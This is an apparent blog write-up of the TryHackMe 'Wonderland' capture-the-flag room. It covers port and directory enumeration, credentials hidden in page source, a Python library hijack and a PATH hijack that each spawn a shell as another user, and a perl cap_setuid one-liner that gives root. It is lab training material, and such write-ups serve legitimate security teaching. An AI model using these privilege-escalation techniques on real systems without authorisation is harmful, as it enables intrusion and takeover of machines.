Skip to main content

Tryhackme

Wonderland

Wonderland
Photo by Haley Lawrence / Unsplash

Basic enumeration

Ports

nmap -vv -p- -oN nmap/ports $IP

Open ports:
22,80

sudo nmap -vv -p 22,80 -Pn -A -sV -sC -oN nmap/init $IP

Services:

22/tcp open  ssh     syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 Golang net/http server (Go-IPFS json-rpc or InfluxDB API)

Directories

Directory enumeration with gobuster:

dir -u http://$IP -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,cgi,sh,txt,html,py,js,xml,css

results:

/index.html           (Status: 301) [Size: 0] [--> ./]
/img                  (Status: 301) [Size: 0] [--> img/]
/main.css             (Status: 200) [Size: 217]
/r                    (Status: 301) [Size: 0] [--> r/]

"img" is a folder containing further images

Checking out the website itself does not reveal a lot. While inspecting the source code, it can bee seen that the image is loaded from the /img endpoint. Maybe there are more pages for the other images.

The page on the /r endpoint tells us to keep going and inspecting the source code does not lead to anything. Using the same gobuster command as before but on the $IP/r directory gives us a new endpoint /r/a/
The website still tells us to keep going. I decided to go with recursive scanning, the pattern seems to be a single character.

Creating a custom wordlist with crunch, that contains lower and upper case letters as well as numbers.

crunch 1 1 ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 -o wonderland.txt

Using the wordlist to fuzz the directories recursively:

ffuf -w ./wonderland.txt -u http://10.10.181.25/r/a/FUZZ -mc 200 -recursion -c

That was easy, we found something. To find what you came for, you just have to inspect the source code of the last directory.

<p style='display:none;'>user:password</p>

With those credentials, ssh access is granted!

Checking out the host with the first user

The first two commands that can be executed to enumerate are:

history
sudo -l

history does almost never work in ctf, but I would consider it good practice anyways ;) In this case the history resides in the abyss:

.bash_history -> /dev/null

sudo -l
[sudo] password for alice: 
Matching Defaults entries for alice on wonderland:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User alice may run the following commands on wonderland:
    (rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

A little overview from the home directory:

ls -al /home

drwxr-xr-x  5 alice     alice     4096 Nov  1 21:02 alice
drwxr-x---  3 hatter    hatter    4096 May 25  2020 hatter
drwxr-x---  2 rabbit    rabbit    4096 May 25  2020 rabbit
drwxr-x---  6 tryhackme tryhackme 4096 May 25  2020 tryhackme

Lets check this python script out:

import random
poem =
"""
# ditched poem lines
"""
for i in range(10):
    line = random.choice(poem.split("\n"))
    print("The line was:\t", line)

I ditched the poem lines, they are not relevant for this writeup.

User alice may run this script as the user rabbit.
In this case python library hijacking can be leveraged for privilege escalation by creating our own random.py. For imports, python checks the current directory first before looking into the PYTHONPATH environment variable.

The python script has to:

  • be named random.py
  • have a function "choice", that takes arguments (the way how it is used in the script)
#!/usr/bin/python3
import os

#*args just to take any arguments in order to ignore them
def choice(*args):
	#since rabbit will be executing this, he will also execute this command and spawn a new bash
    os.system("/bin/bash -")

The original script is then executed like this:

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

Before we delve into the rabbit user I noticed that the root flag seems to reside in alice's home folder...(we better remember that later on!)

Checking out the host as the second user

Now...as rabbit...

history
sudo -l

Nope, we do not have a password and history lives in the abyss again. Checking out the home directory of rabbit...

-rwsr-sr-x 1 root   root   16816 May 25  2020 teaParty

Apart from the terminal that highlights the binary, the permission settings should scream "privesc, sir?".
This is a "setuid" binary, a binary that has the "setuid" bit set, this can be recognised by the "s". This specific binary has also the "setgid" bit set, which does the same as the "setuid", just for the group permissions. What does this mean? Well we can execute this binary as with the permissions of the owner

Executing the binary results in the following:

rabbit@wonderland:/home/rabbit$ ./teaParty
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Wed, 01 Nov 2023 22:15:29 +0000
Ask very nicely, and I will give you some tea while you wait for him

Segmentation fault (core dumped)

(ctrl+c out)

Since there is nothing on the host to analyze the binary we'll go with a good old cat (I have left the klingon form the binary aside):

cat teaParty

/bin/echo -n 'Probably by ' && date --date='next hour'

This is great...two commands, one of the called in a bad way...but good for us!

echo uses the absolute path, meaning it uses the path from root to where the actual binary "echo" sits and date does not.
If a command is executed in the linux cli, linux checks the $PATH variable from left to right until it finds the binary. date resides at the same path as echo does:

which date
/bin/date

echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

More hijacking!
Now we'll create our own date script, similar to what we did with python. Two have it executed we need to PREPEND the path to our script to the $PATH.

rabbit@wonderland:/home/rabbit$ export PATH="/home/rabbit/:$PATH"
rabbit@wonderland:/home/rabbit$ echo $PATH
/home/rabbit/:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

Now lets create the script in our home directory

vim date

The content:

#!/bin/bash

echo "HIJACKED!!!!!!"
/bin/bash -

IMPORTANT make it executable

chmod +x date

Lets give it a try:

abbit@wonderland:/home/rabbit$ ./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by HIJACKED!!!!!!
hatter@wonderland:/home/rabbit$ cat date

Mad hatter!!

Exploring the machine as the third user

By messing up my ls command I noticed something...

ls -al /
drwx--x--x   4 root root       4096 May 25  2020 root

We have eXecute permission on the root directory...

cat /root/user.txt

well. that explains root.txt in ~

For hatter again...no history and we are not allowed to run sudo...
But there is a password.txt in the home directory of hatter...which contains his password
Well at least we can ssh as hatter into the machine.

Before using linpeas we can look for files with capabilites:

getcap -r / 2>/dev/null

/usr/bin/perl5.26.1 = cap_setuid+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/bin/perl = cap_setuid+ep

2>/dev/null throws all the errors into the abyss (next to the bash history :) )

perl has +ep (effective permitted), which can be remembered as "permit everything"

/usr/bin/perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
perl | GTFOBins
GTFOBins

A great resource for privilege escalation!

cat /home/alice/root.txt

Congrats!